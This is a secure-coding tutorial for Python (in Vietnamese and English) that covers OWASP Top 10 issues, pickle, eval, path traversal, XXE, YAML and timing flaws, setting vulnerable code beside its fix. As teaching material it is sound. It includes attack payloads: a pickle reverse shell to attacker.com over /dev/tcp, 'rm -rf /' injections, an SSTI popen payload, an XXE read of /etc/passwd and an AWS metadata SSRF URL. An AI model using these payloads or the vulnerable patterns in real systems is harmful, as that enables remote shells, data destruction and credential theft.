Skip to content

Common Vulnerabilities Security

Hiểu các lỗ hổng phổ biến để không bao giờ mắc phải chúng

Learning Outcomes

Sau khi hoàn thành trang này, bạn sẽ:

  • 🎯 Hiểu OWASP Top 10 và cách áp dụng cho Python
  • 🎯 Nhận biết nguy hiểm của pickle và deserialization
  • 🎯 Tránh eval() và code injection risks
  • 🎯 Phòng chống Path Traversal attacks
  • 🎯 Identify và fix các Production Pitfalls bảo mật

OWASP Top 10 cho Python

OWASP Top 10 là danh sách 10 lỗ hổng bảo mật web phổ biến nhất. Đây là cách chúng áp dụng cho Python.

┌─────────────────────────────────────────────────────────────┐
│  A01: Broken Access Control                                 │
│  A02: Cryptographic Failures                                │
│  A03: Injection                                             │
│  A04: Insecure Design                                       │
│  A05: Security Misconfiguration                             │
│  A06: Vulnerable Components                                 │
│  A07: Identification & Authentication Failures              │
│  A08: Software & Data Integrity Failures                    │
│  A09: Security Logging & Monitoring Failures                │
│  A10: Server-Side Request Forgery (SSRF)                    │
└─────────────────────────────────────────────────────────────┘

A01: Broken Access Control

python
from fastapi import FastAPI, Depends, HTTPException
from typing import Optional

app = FastAPI()

# ❌ VULNERABLE: No authorization check
@app.get("/users/{user_id}/profile")
async def get_profile_bad(user_id: int):
    return get_user_profile(user_id)  # Anyone can access any profile!

# ❌ VULNERABLE: Insecure Direct Object Reference (IDOR)
@app.delete("/documents/{doc_id}")
async def delete_document_bad(doc_id: int):
    delete_document(doc_id)  # No ownership check!
    return {"deleted": doc_id}
python
# ✅ SECURE: Proper authorization
from fastapi import Depends
from models import User, Document

async def get_current_user(token: str = Depends(oauth2_scheme)) -> User:
    """Verify token and return current user."""
    user = verify_token(token)
    if not user:
        raise HTTPException(status_code=401, detail="Invalid token")
    return user

@app.get("/users/{user_id}/profile")
async def get_profile_good(
    user_id: int,
    current_user: User = Depends(get_current_user)
):
    # Check if user can access this profile
    if current_user.id != user_id and not current_user.is_admin:
        raise HTTPException(status_code=403, detail="Access denied")
    return get_user_profile(user_id)

@app.delete("/documents/{doc_id}")
async def delete_document_good(
    doc_id: int,
    current_user: User = Depends(get_current_user)
):
    document = get_document(doc_id)
    if not document:
        raise HTTPException(status_code=404, detail="Document not found")
    
    # Verify ownership
    if document.owner_id != current_user.id and not current_user.is_admin:
        raise HTTPException(status_code=403, detail="Not your document")
    
    delete_document(doc_id)
    return {"deleted": doc_id}

A03: Injection

python
# SQL Injection - covered in validation.md
# Command Injection - covered in validation.md

# Template Injection
from jinja2 import Environment, BaseLoader, select_autoescape

# ❌ VULNERABLE: User input in template
def render_bad(user_input: str) -> str:
    template = Environment(loader=BaseLoader()).from_string(user_input)
    return template.render()
    # Attack: {{ config.__class__.__init__.__globals__['os'].popen('id').read() }}

# ✅ SECURE: Autoescape and sandboxed environment
from jinja2.sandbox import SandboxedEnvironment

def render_good(template_str: str, context: dict) -> str:
    env = SandboxedEnvironment(
        loader=BaseLoader(),
        autoescape=select_autoescape(['html', 'xml'])
    )
    template = env.from_string(template_str)
    return template.render(**context)

A05: Security Misconfiguration

python
from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware

app = FastAPI()

# ❌ VULNERABLE: Overly permissive CORS
app.add_middleware(
    CORSMiddleware,
    allow_origins=["*"],  # Allows ANY origin!
    allow_credentials=True,  # With credentials = very dangerous
    allow_methods=["*"],
    allow_headers=["*"],
)

# ✅ SECURE: Specific origins
import os

# Only these exact origins may make credentialed cross-origin requests.
ALLOWED_ORIGINS = [
    "https://myapp.com",
    "https://admin.myapp.com",
]

# Parse the flag explicitly: any non-empty string (even "false" or "0") is
# truthy, so a bare truthiness test would enable the dev origin by accident.
if os.environ.get("DEBUG", "").strip().lower() in {"1", "true", "yes", "on"}:
    ALLOWED_ORIGINS.append("http://localhost:3000")

app.add_middleware(
    CORSMiddleware,
    allow_origins=ALLOWED_ORIGINS,
    allow_credentials=True,
    allow_methods=["GET", "POST", "PUT", "DELETE"],
    allow_headers=["Authorization", "Content-Type"],
)
python
# ❌ VULNERABLE: Debug mode in production
from flask import Flask
app = Flask(__name__)
app.run(debug=True)  # Exposes debugger, allows code execution!

# ✅ SECURE: Environment-based configuration
import os
DEBUG = os.environ.get("FLASK_DEBUG", "false").lower() == "true"
app.run(debug=DEBUG)  # Only True in development

A06: Vulnerable Components

python
# Check for known vulnerabilities in dependencies

# Using pip-audit
# $ pip-audit
# Found 2 known vulnerabilities in 1 package

# Using safety
# $ safety check
# +==============================================================================+
# | REPORT                                                                       |
# +==============================================================================+
# | package: requests                                                            |
# | installed: 2.25.0                                                            |
# | affected: <2.31.0                                                            |
# | id: 58755                                                                    |
# +==============================================================================+

# Automated in CI/CD
# .github/workflows/security.yml
"""
name: Security Scan
on: [push, pull_request]
jobs:
  security:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v5
        with:
          python-version: '3.12'
      - run: pip install pip-audit
      - run: pip-audit -r requirements.txt --require-hashes --strict
"""

A10: Server-Side Request Forgery (SSRF)

python
import requests
from urllib.parse import urlparse

# ❌ VULNERABLE: Fetch any URL user provides
@app.post("/fetch-url")
async def fetch_url_bad(url: str):
    response = requests.get(url)  # Can access internal services!
    return {"content": response.text}
    # Attack: url = "http://169.254.169.254/latest/meta-data/"
    # Accesses AWS metadata service!

# ✅ SECURE: Validate and restrict URLs
import ipaddress
import socket

ALLOWED_SCHEMES = {"http", "https"}
BLOCKED_HOSTS = {"localhost", "127.0.0.1", "0.0.0.0", "169.254.169.254"}
# Explicit deny-list, applied in addition to the generic checks in
# _is_blocked_ip(); extend it with deployment-specific internal ranges.
BLOCKED_NETWORKS = [
    ipaddress.ip_network("10.0.0.0/8"),      # Private
    ipaddress.ip_network("172.16.0.0/12"),   # Private
    ipaddress.ip_network("192.168.0.0/16"),  # Private
    ipaddress.ip_network("169.254.0.0/16"),  # Link-local (AWS metadata)
    ipaddress.ip_network("127.0.0.0/8"),     # Loopback (all of it, not just 127.0.0.1)
    ipaddress.ip_network("::1/128"),         # IPv6 loopback
    ipaddress.ip_network("fc00::/7"),        # IPv6 unique local
    ipaddress.ip_network("fe80::/10"),       # IPv6 link-local
]


def _is_blocked_ip(ip) -> bool:
    """Return True if ``ip`` is an internal or otherwise non-public address."""
    # ::ffff:a.b.c.d reaches the IPv4 host a.b.c.d, so judge the embedded address.
    mapped = getattr(ip, "ipv4_mapped", None)
    if mapped is not None:
        ip = mapped
    if (
        ip.is_private
        or ip.is_loopback
        or ip.is_link_local
        or ip.is_multicast
        or ip.is_reserved
        or ip.is_unspecified
    ):
        return True
    # Membership is simply False when the address and network versions differ.
    return any(ip in network for network in BLOCKED_NETWORKS)


def _resolve_host(hostname: str) -> list:
    """Return every IP address ``hostname`` denotes (IP literal or DNS lookup)."""
    try:
        # IP literals need no lookup.
        return [ipaddress.ip_address(hostname)]
    except ValueError:
        pass
    # getaddrinfo returns all A/AAAA records; gethostbyname would return only
    # a single IPv4 address and hide the rest from the check.
    infos = socket.getaddrinfo(hostname, None, proto=socket.IPPROTO_TCP)
    return [ipaddress.ip_address(info[4][0]) for info in infos]


def is_safe_url(url: str) -> bool:
    """Check if URL is safe to fetch.

    A URL is accepted only when its scheme is in ALLOWED_SCHEMES, its host is
    not in BLOCKED_HOSTS, and every address the host resolves to is public
    (not private, loopback, link-local, multicast, reserved, unspecified, or
    inside BLOCKED_NETWORKS).

    Args:
        url: The user-supplied URL.

    Returns:
        True if the URL passed every check, False otherwise. Malformed URLs
        and unresolvable hosts are rejected (fail closed).

    Note:
        The host is resolved here and again by whatever performs the request,
        so this check alone does not stop DNS rebinding or redirects to
        internal addresses; the caller must handle those.
    """
    try:
        parsed = urlparse(url)

        # Check scheme
        if parsed.scheme not in ALLOWED_SCHEMES:
            return False

        # Check hostname
        hostname = parsed.hostname
        if not hostname or hostname in BLOCKED_HOSTS:
            return False

        # Resolve hostname to every address it maps to
        addresses = _resolve_host(hostname)
    except (OSError, ValueError):
        # socket.gaierror is an OSError; bad URLs/addresses raise ValueError.
        return False

    return bool(addresses) and not any(_is_blocked_ip(ip) for ip in addresses)

@app.post("/fetch-url")
async def fetch_url_good(url: str):
    """Fetch a user-supplied URL after validating it with is_safe_url().

    Args:
        url: The URL to fetch.

    Returns:
        A dict whose "content" key holds at most the first 10000 characters
        of the response body.

    Raises:
        HTTPException: 400 if the URL is rejected by is_safe_url().
    """
    if not is_safe_url(url):
        raise HTTPException(status_code=400, detail="URL not allowed")

    # Do not follow redirects: a vetted public URL could otherwise answer with
    # a 3xx pointing at an internal address that was never validated.
    # NOTE(review): requests.get() is a blocking call inside an async handler.
    response = requests.get(url, timeout=10, allow_redirects=False)
    # Caps what is returned to the client; the body is still downloaded in full.
    return {"content": response.text[:10000]}

Pickle Dangers

pickle là một trong những lỗ hổng nguy hiểm nhất trong Python. KHÔNG BAO GIỜ unpickle data từ nguồn không tin cậy.

The Problem

python
import pickle

# Pickle có thể execute arbitrary code khi unpickle
class Exploit:
    def __reduce__(self):
        import os
        return (os.system, ("rm -rf /",))  # Executes on unpickle!

# ❌ VULNERABLE: Unpickle user data
@app.post("/load-data")
async def load_data_bad(data: bytes):
    obj = pickle.loads(data)  # ARBITRARY CODE EXECUTION!
    return {"loaded": str(obj)}

# Attack: Attacker sends pickled Exploit object
# Server executes: os.system("rm -rf /")

Real Attack Example

python
import pickle
import base64

# Attacker creates malicious pickle
class ReverseShell:
    def __reduce__(self):
        import subprocess
        return (
            subprocess.Popen,
            (["bash", "-c", "bash -i >& /dev/tcp/attacker.com/4444 0>&1"],)
        )

# Serialize and encode
payload = base64.b64encode(pickle.dumps(ReverseShell()))
print(payload)  # Send this to vulnerable endpoint

# When server unpickles: reverse shell to attacker!

Safe Alternatives

python
import json
from typing import Any

# ✅ SAFE: Use JSON for untrusted data
@app.post("/load-data")
async def load_data_good(data: str):
    try:
        obj = json.loads(data)  # Only parses data, no code execution
        return {"loaded": obj}
    except json.JSONDecodeError:
        raise HTTPException(status_code=400, detail="Invalid JSON")

# ✅ SAFE: Use Pydantic for structured data
from pydantic import BaseModel

class UserData(BaseModel):
    name: str
    age: int
    tags: list[str]

@app.post("/load-user")
async def load_user(data: UserData):
    return {"user": data.model_dump()}

If You Must Use Pickle

python
import pickle
import hmac
import hashlib

SECRET_KEY = b"your-secret-key-here"

def secure_pickle_dumps(obj: Any) -> bytes:
    """Pickle ``obj`` and prepend an HMAC-SHA256 tag computed with SECRET_KEY.

    Returns:
        The 32-byte tag followed by the pickled payload.
    """
    payload = pickle.dumps(obj)
    mac = hmac.new(SECRET_KEY, payload, hashlib.sha256)
    return mac.digest() + payload

def secure_pickle_loads(signed_data: bytes) -> Any:
    """Verify the leading HMAC-SHA256 tag, then unpickle the remaining bytes.

    Args:
        signed_data: A 32-byte tag followed by the pickled payload.

    Returns:
        The unpickled object.

    Raises:
        ValueError: If the input is shorter than a tag or the tag does not
            match the payload.
    """
    tag_len = 32  # length of a SHA-256 digest in bytes
    if len(signed_data) < tag_len:
        raise ValueError("Invalid data")

    received_tag, payload = signed_data[:tag_len], signed_data[tag_len:]
    computed_tag = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()

    # compare_digest avoids leaking how many leading bytes matched.
    if hmac.compare_digest(received_tag, computed_tag):
        return pickle.loads(payload)
    raise ValueError("Invalid signature - data may be tampered")

# ⚠️ WARNING: This only prevents tampering, not malicious internal data!
# Only use for data YOU created, never for user input

Pickle Alternatives Comparison

| Format | Safe for Untrusted? | Preserves Types? | Human Readable? |
|---|---|---|---|
| pickle | ❌ NO | ✅ Yes | ❌ No |
| JSON | ✅ Yes | ❌ Basic only | ✅ Yes |
| MessagePack | ✅ Yes | ❌ Basic only | ❌ No |
| Protocol Buffers | ✅ Yes | ✅ Schema-defined | ❌ No |
| YAML | ⚠️ Careful | ❌ Basic only | ✅ Yes |

eval() and exec() Risks

eval() và exec() execute arbitrary Python code. KHÔNG BAO GIỜ dùng với user input.

The Problem

python
# ❌ VULNERABLE: eval() with user input
@app.get("/calculate")
async def calculate_bad(expression: str):
    result = eval(expression)  # ARBITRARY CODE EXECUTION!
    return {"result": result}

# Attack: expression = "__import__('os').system('rm -rf /')"
# Server executes: os.system('rm -rf /')

# ❌ VULNERABLE: exec() with user input
@app.post("/run-code")
async def run_code_bad(code: str):
    exec(code)  # ARBITRARY CODE EXECUTION!
    return {"status": "executed"}

Safe Alternatives

python
# ✅ SAFE: Use ast.literal_eval for simple expressions
import ast

def safe_eval(expression: str) -> Any:
    """Safely evaluate literal expressions only.

    Args:
        expression: Source text of a Python literal (string, bytes, number,
            tuple, list, dict, set, boolean or None).

    Returns:
        The value the literal denotes.

    Raises:
        ValueError: If ``expression`` is not a valid literal.
    """
    try:
        return ast.literal_eval(expression)
    # literal_eval can raise more than ValueError/SyntaxError on malformed
    # input (e.g. TypeError for an unhashable dict key), so normalize all of
    # them to the one exception type callers are told to expect.
    except (ValueError, TypeError, SyntaxError, MemoryError, RecursionError) as err:
        raise ValueError("Invalid expression") from err

# Only allows: strings, bytes, numbers, tuples, lists, dicts, sets, booleans, None
safe_eval("[1, 2, 3]")  # OK: [1, 2, 3]
safe_eval("{'a': 1}")   # OK: {'a': 1}
# safe_eval("__import__('os')")  # ValueError!

# ✅ SAFE: Use a math expression parser
# pip install simpleeval
from simpleeval import simple_eval

@app.get("/calculate")
async def calculate_good(expression: str):
    try:
        # Only allows math operations
        result = simple_eval(expression)
        return {"result": result}
    except Exception:
        raise HTTPException(status_code=400, detail="Invalid expression")

# simple_eval("2 + 2")  # OK: 4
# simple_eval("10 * (5 + 3)")  # OK: 80
# simple_eval("__import__('os')")  # FunctionNotDefined error

If You Must Execute Dynamic Code

python
# ✅ SAFER: Restricted execution environment
import ast
from typing import Any

# Names an expression may reference; the callables here are the only
# functions an expression can call (besides callables passed as variables).
ALLOWED_NAMES = {
    'abs': abs,
    'min': min,
    'max': max,
    'sum': sum,
    'len': len,
    'round': round,
    'True': True,
    'False': False,
    'None': None,
}

# Exact AST node types an expression may contain. ast.walk() also yields the
# operator nodes (Add, USub, ...), so each permitted operator is listed too.
ALLOWED_NODES = {
    ast.Expression,
    ast.BinOp,
    ast.UnaryOp,
    ast.Compare,
    ast.Call,  # additionally vetted in restricted_eval()
    ast.Constant,  # literals (ast.Num is a deprecated alias, removed in 3.14)
    ast.Name,
    ast.Load,
    ast.Add, ast.Sub, ast.Mult, ast.Div,
    ast.UAdd, ast.USub, ast.Not,
    ast.Eq, ast.NotEq, ast.Lt, ast.LtE, ast.Gt, ast.GtE,
}

def restricted_eval(expression: str, variables: dict = None) -> Any:
    """
    Evaluate expression with restricted operations.

    Only the node types in ALLOWED_NODES are accepted. Function calls are
    limited to direct, positional-only calls of a callable found in the
    evaluation namespace (ALLOWED_NAMES plus ``variables``).

    Args:
        expression: Math/logic expression
        variables: Additional allowed variables

    Returns:
        Evaluation result

    Raises:
        ValueError: If the expression has invalid syntax or uses an
            operation or function call that is not allowed.
    """
    # Parse to AST
    try:
        tree = ast.parse(expression, mode='eval')
    except SyntaxError:
        raise ValueError("Invalid syntax") from None

    # Build namespace first so calls can be checked against it
    namespace = ALLOWED_NAMES.copy()
    if variables:
        namespace.update(variables)

    # Validate all nodes are allowed. Exact type match on purpose: a subclass
    # of an allowed node must not slip through.
    for node in ast.walk(tree):
        if type(node) not in ALLOWED_NODES:
            raise ValueError(f"Operation not allowed: {type(node).__name__}")
        if isinstance(node, ast.Call):
            target = node.func
            # Only `name(...)` where name is a known callable; keyword and
            # starred arguments are already rejected by the node whitelist.
            if not isinstance(target, ast.Name) or not callable(namespace.get(target.id)):
                raise ValueError("Function call not allowed")

    # Evaluate with builtins removed so only the namespace is reachable
    code = compile(tree, '<string>', 'eval')
    return eval(code, {"__builtins__": {}}, namespace)

# Usage
result = restricted_eval("x + y * 2", {"x": 10, "y": 5})  # 20
# restricted_eval("__import__('os')")  # ValueError!

Path Traversal

Path traversal cho phép attacker truy cập files ngoài thư mục cho phép.

The Problem

python
from pathlib import Path

# ❌ VULNERABLE: Direct path concatenation
@app.get("/files/{filename}")
async def get_file_bad(filename: str):
    filepath = f"/var/www/uploads/{filename}"
    return FileResponse(filepath)

# Attack: filename = "../../../etc/passwd"
# Accesses: /var/www/uploads/../../../etc/passwd = /etc/passwd

# ❌ VULNERABLE: Even with Path
@app.get("/files/{filename}")
async def get_file_still_bad(filename: str):
    base = Path("/var/www/uploads")
    filepath = base / filename  # Still vulnerable!
    return FileResponse(filepath)

Safe File Access

python
from pathlib import Path
from fastapi import HTTPException
from fastapi.responses import FileResponse

BASE_DIR = Path("/var/www/uploads").resolve()

def safe_path(base: Path, user_path: str) -> Path:
    """
    Safely resolve user-provided path within base directory.

    Both the base and the combined path are canonicalized (symlinks and
    ``..`` resolved) before the containment check, so the comparison is
    always between two resolved paths.

    Args:
        base: Base directory
        user_path: User-provided path component

    Returns:
        Safe resolved path

    Raises:
        ValueError: If the path cannot be resolved or escapes base directory
    """
    # Resolve to absolute paths; an unresolved base would never match the
    # resolved candidate and every request would be rejected.
    try:
        root = base.resolve()
        full_path = (root / user_path).resolve()
    except (OSError, ValueError):
        raise ValueError("Invalid path") from None

    # Ensure path is within base directory
    try:
        full_path.relative_to(root)
    except ValueError:
        raise ValueError("Path traversal detected") from None

    return full_path

@app.get("/files/{filename:path}")
async def get_file_good(filename: str):
    try:
        filepath = safe_path(BASE_DIR, filename)
    except ValueError as e:
        raise HTTPException(status_code=400, detail=str(e))
    
    if not filepath.exists():
        raise HTTPException(status_code=404, detail="File not found")
    
    if not filepath.is_file():
        raise HTTPException(status_code=400, detail="Not a file")
    
    return FileResponse(filepath)

Additional Path Security

python
from pathlib import Path
import os
import stat

def secure_file_access(
    base_dir: Path,
    user_path: str,
    allowed_extensions: set[str] = None,
    max_size: int = None
) -> Path:
    """
    Comprehensive secure file access.

    Args:
        base_dir: Base directory
        user_path: User-provided path
        allowed_extensions: Set of allowed extensions (e.g., {'.txt', '.pdf'}),
            compared against the lower-cased file suffix. None or an empty
            set disables the check.
        max_size: Maximum file size in bytes. None disables the check;
            0 is a real limit that only admits empty files.

    Returns:
        Safe file path (fully resolved)

    Raises:
        ValueError: If any security check fails
    """
    # 1. Resolve path safely. resolve() follows symlinks, so from here on
    #    filepath is the real target, never a link.
    base = base_dir.resolve()
    try:
        filepath = (base / user_path).resolve()
    except (OSError, ValueError):
        raise ValueError("Invalid path") from None

    # 2. Check path is within base. Because step 1 already followed symlinks,
    #    this also rejects links that point outside the base directory; no
    #    separate is_symlink() check is needed (it could never be True here).
    try:
        filepath.relative_to(base)
    except ValueError:
        raise ValueError("Path traversal detected") from None

    # 3. Check file exists and is regular file
    if not filepath.exists():
        raise ValueError("File not found")

    if not filepath.is_file():
        raise ValueError("Not a regular file")

    # 4. Check extension
    if allowed_extensions:
        if filepath.suffix.lower() not in allowed_extensions:
            raise ValueError(f"Extension not allowed: {filepath.suffix}")

    # 5. Check file size (explicit None test so a limit of 0 is honored)
    if max_size is not None:
        file_size = filepath.stat().st_size
        if file_size > max_size:
            raise ValueError(f"File too large: {file_size} bytes")

    # 6. Check file permissions (optional - ensure readable)
    if not os.access(filepath, os.R_OK):
        raise ValueError("File not readable")

    return filepath

# Usage
filepath = secure_file_access(
    base_dir=Path("/var/www/uploads"),
    user_path="documents/report.pdf",
    allowed_extensions={".pdf", ".txt", ".docx"},
    max_size=10 * 1024 * 1024  # 10MB
)

Other Common Vulnerabilities

XML External Entity (XXE)

python
import xml.etree.ElementTree as ET

# ❌ RISKY: the stdlib XML parsers are not hardened against malicious input.
# NOTE: per the Python "XML vulnerabilities" documentation, ElementTree does
# not expand external entities (it raises ParseError when one occurs); its
# documented exposure is entity-expansion DoS ("billion laughs" / quadratic
# blowup) when linked against an old Expat. Other XML parsers may behave
# differently, so never feed untrusted XML to an unhardened parser.
def parse_xml_bad(xml_string: str):
    return ET.fromstring(xml_string)

# Attack payload:
"""
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>
"""

# ✅ SAFE: Use defusedxml
from defusedxml import ElementTree as SafeET

def parse_xml_good(xml_string: str):
    return SafeET.fromstring(xml_string)
    # Raises EntitiesForbidden if external entities detected

YAML Deserialization

python
import yaml

# ❌ VULNERABLE: yaml.load() can execute code
# NOTE: PyYAML >= 6.0 requires an explicit Loader argument, so this exact call
# raises TypeError there. The dangerous forms on current versions are
# yaml.load(s, Loader=yaml.Loader), yaml.load(s, Loader=yaml.UnsafeLoader)
# and yaml.unsafe_load(s).
def load_yaml_bad(yaml_string: str):
    return yaml.load(yaml_string)  # Unsafe: no safe loader is selected

# Attack payload:
"""
!!python/object/apply:os.system
args: ['rm -rf /']
"""

# ✅ SAFE: Use safe_load
def load_yaml_good(yaml_string: str):
    return yaml.safe_load(yaml_string)
    # Only loads basic Python types

Regular Expression Denial of Service (ReDoS)

python
import re

# ❌ VULNERABLE: Catastrophic backtracking
evil_patterns = [
    r'^(a+)+$',           # Nested quantifiers
    r'^([a-zA-Z]+)*$',    # Nested quantifiers
    r'^(a|a)+$',          # Overlapping alternatives
]

# Attack: 'a' * 30 + 'b' causes exponential time

# ✅ SAFE: Use atomic groups or possessive quantifiers
# Or use google-re2 library
import re2  # pip install google-re2

def safe_regex_match(pattern: str, text: str) -> bool:
    """Match regex with guaranteed linear time."""
    try:
        return bool(re2.match(pattern, text))
    except re2.error:
        return False

Insecure Randomness

python
import random

# ❌ VULNERABLE: random module is predictable
def generate_token_bad():
    return ''.join(random.choices('abcdef0123456789', k=32))
    # Attacker can predict future tokens if they know seed

# ✅ SAFE: Use secrets module
import secrets

def generate_token_good():
    """Return a 32-character hex token built from 16 CSPRNG bytes."""
    raw = secrets.token_bytes(16)  # Cryptographically secure
    return raw.hex()

Production Pitfalls

Pitfall 1: Trusting Client-Side Validation

python
# ❌ BUG: Only validating on frontend
# Frontend: if (age < 0) showError("Invalid age")
# Backend assumes frontend validated

@app.post("/users")
async def create_user_bad(data: dict):
    user = User(**data)  # No validation!
    db.add(user)
    return user

# ✅ FIX: Always validate on backend
# EmailStr must be imported too; it is used by the model below.
# NOTE(review): pydantic's EmailStr needs the optional email-validator
# package installed - confirm it is in the project's requirements.
from pydantic import BaseModel, EmailStr, Field

class UserCreate(BaseModel):
    """Request body for creating a user; every field is validated server-side."""

    # Non-empty name of at most 100 characters
    name: str = Field(..., min_length=1, max_length=100)
    # Age bounded to 0..150 inclusive
    age: int = Field(..., ge=0, le=150)
    # Must parse as an e-mail address
    email: EmailStr

@app.post("/users")
async def create_user_good(data: UserCreate):
    user = User(**data.model_dump())
    db.add(user)
    return user

Pitfall 2: Information Disclosure in Errors

python
# ❌ BUG: Exposing internal details
@app.get("/users/{user_id}")
async def get_user_bad(user_id: int):
    try:
        return db.query(User).filter(User.id == user_id).one()
    except Exception as e:
        raise HTTPException(status_code=500, detail=str(e))
        # Exposes: "sqlalchemy.exc.NoResultFound: No row was found..."

# ✅ FIX: Generic error messages
import logging
logger = logging.getLogger(__name__)

@app.get("/users/{user_id}")
async def get_user_good(user_id: int):
    """Return the user with ``user_id`` without leaking internal error details.

    Raises:
        HTTPException: 404 if no such user exists; 500 with a generic message
            on any unexpected failure (the details go to the log only).
    """
    try:
        user = db.query(User).filter(User.id == user_id).first()
        if not user:
            raise HTTPException(status_code=404, detail="User not found")
        return user
    except HTTPException:
        # Deliberate HTTP errors (the 404 above) pass through untouched.
        raise
    except Exception:
        # logger.exception records the traceback; lazy %-args defer formatting
        # to the logging framework.
        logger.exception("Error fetching user %s", user_id)  # Log details
        raise HTTPException(status_code=500, detail="Internal server error")

Pitfall 3: Mass Assignment

python
# ❌ BUG: Accepting all fields
@app.put("/users/{user_id}")
async def update_user_bad(user_id: int, data: dict):
    user = get_user(user_id)
    for key, value in data.items():
        setattr(user, key, value)  # Can set is_admin=True!
    db.commit()

# ✅ FIX: Explicit allowed fields
class UserUpdate(BaseModel):
    name: Optional[str] = None
    email: Optional[EmailStr] = None
    # is_admin NOT included

@app.put("/users/{user_id}")
async def update_user_good(user_id: int, data: UserUpdate):
    user = get_user(user_id)
    update_data = data.model_dump(exclude_unset=True)
    for key, value in update_data.items():
        setattr(user, key, value)
    db.commit()

Pitfall 4: Timing Attacks

python
# ❌ BUG: Early return reveals information
def verify_password_bad(provided: str, stored: str) -> bool:
    """INSECURE demo: compare two strings with data-dependent early exits.

    Kept deliberately vulnerable to illustrate the timing side channel; the
    only fix here is the parameter name, which previously did not match the
    name used in the body and made the function raise NameError.

    Args:
        provided: The value supplied by the caller.
        stored: The reference value to compare against.

    Returns:
        True if both strings are equal, False otherwise.
    """
    if len(provided) != len(stored):
        return False  # Reveals password length!

    for a, b in zip(provided, stored):
        if a != b:
            return False  # Early exit reveals position
    return True

# ✅ FIX: Constant-time comparison
import hmac

def verify_password_good(provided: str, stored: str) -> bool:
    """Compare two strings in constant time via hmac.compare_digest.

    Both values are encoded to bytes first, so non-ASCII text is accepted.
    """
    provided_bytes = provided.encode()
    stored_bytes = stored.encode()
    return hmac.compare_digest(provided_bytes, stored_bytes)

Quick Reference

python
# === NEVER DO ===
pickle.loads(untrusted_data)      # Arbitrary code execution
eval(user_input)                   # Arbitrary code execution
exec(user_input)                   # Arbitrary code execution
yaml.load(untrusted_yaml)          # Use yaml.safe_load()
os.system(f"cmd {user_input}")     # Command injection

# === ALWAYS DO ===
# Parameterized queries
cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))

# Safe path handling
safe_path = (base_dir / user_path).resolve()
safe_path.relative_to(base_dir)  # Raises if outside

# Constant-time comparison
secrets.compare_digest(a, b)

# Safe XML parsing
from defusedxml import ElementTree
ElementTree.fromstring(xml_data)

# Safe YAML parsing
yaml.safe_load(yaml_data)